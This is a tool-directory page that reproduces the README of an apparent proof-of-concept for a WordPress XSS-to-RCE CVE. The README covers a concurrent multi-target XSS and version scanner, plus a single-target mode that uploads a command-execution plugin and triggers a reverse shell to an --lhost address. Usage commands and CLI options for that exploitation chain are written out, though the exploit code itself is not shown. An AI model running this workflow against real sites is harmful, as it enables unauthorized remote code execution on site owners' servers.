Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
XSS2Shell-CVE-2026-64638 — Authorized WordPress XSS-to-RCE scanner with concurrent multi-target XSS reflection and version fingerprint detection, plus optional exploitation workflow. | Kitploit
Strumenti/GitHubGitHub/yogagymn/xss2shell-cve-2026-64638
ReconnaissanceWeb Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHub

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
yogagymn/xss2shell-cve-2026-64638

XSS2Shell-CVE-2026-64638

Authorized WordPress XSS-to-RCE scanner with concurrent multi-target XSS reflection and version fingerprint detection, plus optional exploitation workflow.

Vedi Repository
1202 mesi faNon ancora revisionato
Condividi
Contenuto non disponibile nella lingua richiesta. Visualizzazione della versione inglese.

XSS2Shell Multi-Target Scanner

Developer: YogaGymn

PoC/scanning utility for authorized WordPress security testing. The project contains a single-target exploitation workflow and a concurrent multi-target scan-only mode.

Important: Use this project only on WordPress installations that you own or have explicit authorization to test. The multi-target scanner is intentionally limited to fingerprinting and XSS reflection detection; it does not perform credential capture, plugin upload, or RCE against a target list.

Features

Single-target mode

The original script supports:

  • WordPress version fingerprinting.
  • XSS reflection detection.
  • auto, xss, and direct modes.
  • Direct WordPress authentication and plugin upload workflow.
  • XSS-chain functionality present in the original PoC.
  • Optional callback/reverse-shell functionality present in the original PoC.

Multi-target mode

The added scanner supports:

  • Reading targets from a text file.
  • Removing duplicate targets.
  • Concurrent scanning with ThreadPoolExecutor.
  • Configurable worker count.
  • WordPress version detection.
  • XSS reflection detection.
  • Progress reporting.
  • Results saved in the same order as the input file.
  • Summary statistics.

The multi-target mode does not call the original RCE functions.

Requirements

  • Python 3.9+
  • requests

Install the dependency:

python3 -m pip install requests

If your Linux distribution uses an externally managed Python environment, use a virtual environment:

python3 -m venv .venv
source .venv/bin/activate
pip install requests

Installation

Clone or copy the project:

git clone https://github.com/yogaGymn/XSS2Shell-CVE-2026-64638
cd XSS2Shell-CVE-2026-64638

Or simply place:

xss2shell.py

in your working directory.

Multi-Target Scanner

Create a file named targets.txt:

https://example1.test
https://example2.test
https://example3.test

Comments and empty lines are ignored:

# Authorized lab targets
https://example1.test

https://example2.test

Run the scanner:

python3 xss2shell.py -i targets.txt

Default concurrency is 10 workers.

Change concurrency

For example, use 20 workers:

python3 xss2shell.py -i targets.txt --workers 20

For a small lab:

python3 xss2shell.py -i targets.txt --workers 5

Do not choose an unnecessarily high worker count because it can increase connection load and may trigger rate limiting or defensive controls.

Change output file

python3 xss2shell.py \
  -i targets.txt \
  --workers 10 \
  --output results.txt

Example Output

[*] Multiple-target scan: 3 target(s)
[*] Concurrent workers: 10
[*] Scan-only: WordPress fingerprint + XSS reflection check
[*] No login, plugin upload, credential capture, or RCE

[1/3] https://example1.test | WP=6.8.2 | XSS=XSS_NOT_DETECTED (ESCAPED)
[2/3] https://example2.test | WP=6.7.1 | XSS=XSS_REFLECTION_DETECTED (AREA_BYPASS)
[3/3] https://example3.test | WP=unknown | XSS=XSS_NOT_DETECTED (NOT_REFLECTED)

=======================================================
MULTIPLE-TARGET SCAN COMPLETE
=======================================================
Total targets : 3
XSS detected  : 1
Not detected  : 2
Errors        : 0
Results saved : scan_results.txt

Result Format

The default scan_results.txt uses tab-separated fields:

TARGET  WORDPRESS_VERSION  XSS_STATUS  XSS_DETAIL

Example:

https://example1.test    6.8.2    XSS_NOT_DETECTED          ESCAPED
https://example2.test    6.7.1    XSS_REFLECTION_DETECTED   AREA_BYPASS

XSS status values


Status Meaning


XSS_REFLECTION_DETECTED The scanner detected the tested HTML reflection behavior. This is not by itself proof of RCE.

XSS_NOT_DETECTED The tested reflection was not detected.

ERROR The check encountered an exception.

XSS detail values

The scanner can report details such as:

  • RAW_HTML
  • AREA_BYPASS
  • ESCAPED
  • STRIPPED
  • NOT_REFLECTED

These values describe the response observed by the detection routine; they should be manually validated before treating a result as a confirmed vulnerability.

Single-Target Usage

The original script also supports single-target arguments.

Auto mode

python3 xss2shell.py \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

Direct mode

python3 xss2shell.py \
  --mode direct \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

XSS mode

python3 xss2shell.py \
  --mode xss \
  --lhost 192.0.2.10 \
  http://authorized-lab.test

The XSS/direct workflows can create or activate a plugin containing command-execution functionality. Use them only inside an authorized test environment.

CLI Reference

usage: xss2shell.py [-h]
       [-i TARGET_FILE] [--output OUTPUT] [--workers WORKERS]
       [--mode {auto,xss,direct}]
       [-u USERNAME] [-p PASSWORD]
       [--lhost LHOST] [--lport LPORT]
       [--slug SLUG] [--callback-port CALLBACK_PORT]
       [--no-rev]
       [target]

Arguments


Argument Description


target Single target URL.

-i, --input File containing multiple targets.

--output Output file for multi-target results. Default: scan_results.txt.

--workers Number of concurrent workers. Default: 10.

--mode Original single-target mode: auto, xss, or direct.

-u, --username WordPress username for the original direct/fallback workflow.

-p, --password WordPress password for the original direct/fallback workflow.

--lhost Callback/reverse-shell host for the original PoC.

--lport Reverse-shell port. Default: 4444.

--slug Plugin slug. Default: xss2shell.

--callback-port Callback server port. Default: 9090.

--no-rev Skip reverse-shell triggering in the original workflow.

How Concurrent Scanning Works

The multi-target mode uses Python's:

ThreadPoolExecutor

Each target is submitted as an independent scanning task:

targets.txt
     |
     v
+----+----+----+----+
| T1 | T2 | T3 | T4 | ... 
+----+----+----+----+
  |    |    |    |
  v    v    v    v
 WP   WP   WP   WP
 XSS  XSS  XSS  XSS
  |    |    |    |
  +----+----+----+
        |
        v
   scan_results.txt

Results are collected as workers finish, while the final output is written according to the original target order.

Scope and Safety

Scarica lo strumento